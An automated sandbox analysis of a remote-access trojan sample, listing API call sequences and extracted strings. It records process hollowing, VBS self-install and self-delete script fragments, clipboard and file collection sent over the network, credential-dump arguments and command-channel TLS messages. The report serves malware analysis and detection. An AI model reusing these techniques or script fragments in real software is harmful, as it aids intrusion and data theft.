                          • API String ID: 1815803762-0
                          • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                          • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                          • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                          • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                          APIs
                          • OpenClipboard.USER32(00000000), ref: 0040A65D
                          • GetClipboardData.USER32(0000000D), ref: 0040A669
                          • CloseClipboard.USER32 ref: 0040A671
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Clipboard$CloseDataOpen
                          • String ID:
                          • API String ID: 2058664381-0
                          • Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                          • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                          • Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                          • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-3916222277
                          • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                          • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                          • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                          • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .
                          • API String ID: 0-248832578
                          • Opcode ID: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
                          • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
                          • Opcode Fuzzy Hash: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
                          • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFind$FirstNextsend
                          • String ID:
                          • API String ID: 4113138495-0
                          • Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                          • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                          • Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                          • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                            • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free$InfoLocale_abort
                          • String ID:
                          • API String ID: 1663032902-0
                          • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                          • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                          • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                          • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID:
                          • API String ID: 1084509184-0
                          • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                          • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                          • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                          • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$InfoLocale_abort_free
                          • String ID:
                          • API String ID: 2692324296-0
                          • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                          • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                          • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                          • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID:
                          • API String ID: 1084509184-0
                          • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                          • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                          • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                          • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                          APIs
                          • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                          • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                          • Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                          • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                          APIs
                            • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                          • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalEnterEnumLocalesSectionSystem
                          • String ID:
                          • API String ID: 1272433827-0
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID:
                          • API String ID: 1084509184-0
                          APIs
                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                          • GetProcAddress.KERNEL32(00000000), ref: 00416477
                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                          • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                          • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                          • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                          • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                          • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                          • ResumeThread.KERNEL32(?), ref: 00416773
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                          • GetCurrentProcess.KERNEL32(?), ref: 00416795
                          • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                          • GetLastError.KERNEL32 ref: 004167B8
                          Strings
                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                          • API String ID: 4188446516-3035715614
                          APIs
                          • _wcslen.LIBCMT ref: 0040B882
                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                          • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                          • _wcslen.LIBCMT ref: 0040B968
                          • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                          • _wcslen.LIBCMT ref: 0040BA25
                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                          • ExitProcess.KERNEL32 ref: 0040BC36
                          Strings
                          • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                          • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                          • API String ID: 2743683619-2376316431
                          APIs
                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                          • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                          • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                          • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                          Strings
                          • API ID: File$Write$Create
                          • String ID: RIFF$WAVE$data$fmt
                          • API String ID: 1602526932-4212202414
                          APIs
                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                          • LoadLibraryA.KERNEL32(?), ref: 0041386D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                          • FreeLibrary.KERNEL32(00000000), ref: 00413894
                          • LoadLibraryA.KERNEL32(?), ref: 004138CC
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                          • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                          • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                          • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                          Strings
                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                          • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
                          • API String ID: 2490988753-3443138237
                          APIs
                          • API ID: _free$EnvironmentVariable$_wcschr
                          • String ID:
                          • API String ID: 3899193279-0
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                          • _free.LIBCMT ref: 0044E4DF
                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                          • _free.LIBCMT ref: 0044E501
                          • _free.LIBCMT ref: 0044E516
                          • _free.LIBCMT ref: 0044E521
                          • _free.LIBCMT ref: 0044E543
                          • _free.LIBCMT ref: 0044E556
                          • _free.LIBCMT ref: 0044E564
                          • _free.LIBCMT ref: 0044E56F
                          • _free.LIBCMT ref: 0044E5A7
                          • _free.LIBCMT ref: 0044E5AE
                          • _free.LIBCMT ref: 0044E5CB
                          • _free.LIBCMT ref: 0044E5E3
                          Strings
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID: pF
                          • API String ID: 161543041-2973420481
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                            • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                            • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                            • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                          • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                          • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                          • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                          • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                          • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                          • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                          • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                          • Sleep.KERNEL32(00000064), ref: 00411C63
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          Strings
                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                          • String ID: /stext "$$.F$@#G$@#G
                          • API String ID: 1223786279-2596709126
                          APIs
                          Strings
                          • API ID: _free
                          • String ID: pF
                          • API String ID: 269201875-2973420481
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                          • RegCloseKey.ADVAPI32(?), ref: 0041A749
                          Strings
                          • API ID: CloseEnumOpen
                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                          • API String ID: 1332880857-3714951968
                          APIs
                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                          • GetCursorPos.USER32(?), ref: 0041B39E
                          • SetForegroundWindow.USER32(?), ref: 0041B3A7
                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                          • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                          • ExitProcess.KERNEL32 ref: 0041B41A
                          • CreatePopupMenu.USER32 ref: 0041B420
                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                          Strings
                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                          • String ID: Close
                          • API String ID: 1657328048-3535843008
                          APIs
                          • API ID: _free$Info
                          • String ID:
                          • API String ID: 2509303402-0
                          APIs
                            • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                            • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                            • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                            • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                            • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                          • ExitProcess.KERNEL32 ref: 0040C57D
                          Strings
                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                          • API String ID: 1913171305-2600661426
                          APIs
                          • connect.WS2_32(?,?,?), ref: 004048C0
                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                          • WSAGetLastError.WS2_32 ref: 00404A01
                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                          Strings
                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                          • API String ID: 994465650-2151626615
                          Strings
                          • API ID:
                          • String ID: 65535$udp
                          • API String ID: 0-1267037602
                          APIs
                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
                          Strings
                          • API ID: LongNamePath
                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                          • API String ID: 82841172-425784914
                          • Opcode ID: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                          • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                          • Opcode Fuzzy Hash: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                          • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                          • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                          • __dosmaperr.LIBCMT ref: 00438646
                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                          • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                          • __dosmaperr.LIBCMT ref: 00438683
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                          • __dosmaperr.LIBCMT ref: 004386D7
                          • _free.LIBCMT ref: 004386E3
                          • _free.LIBCMT ref: 004386EA
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                          • String ID:
                          • API String ID: 2441525078-0
                          • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                          • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                          • Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                          • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                          APIs
                          • SetEvent.KERNEL32(?,?), ref: 0040549F
                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                          • TranslateMessage.USER32(?), ref: 0040555E
                          • DispatchMessageA.USER32(?), ref: 00405569
                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                          • String ID: CloseChat$DisplayMessage$GetMessage
                          • API String ID: 2956720200-749203953
                          • Opcode ID: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                          • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                          • Opcode Fuzzy Hash: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                          • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                          APIs
                            • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                          • CloseHandle.KERNEL32(00000000), ref: 00416123
                          • DeleteFileA.KERNEL32(00000000), ref: 00416132
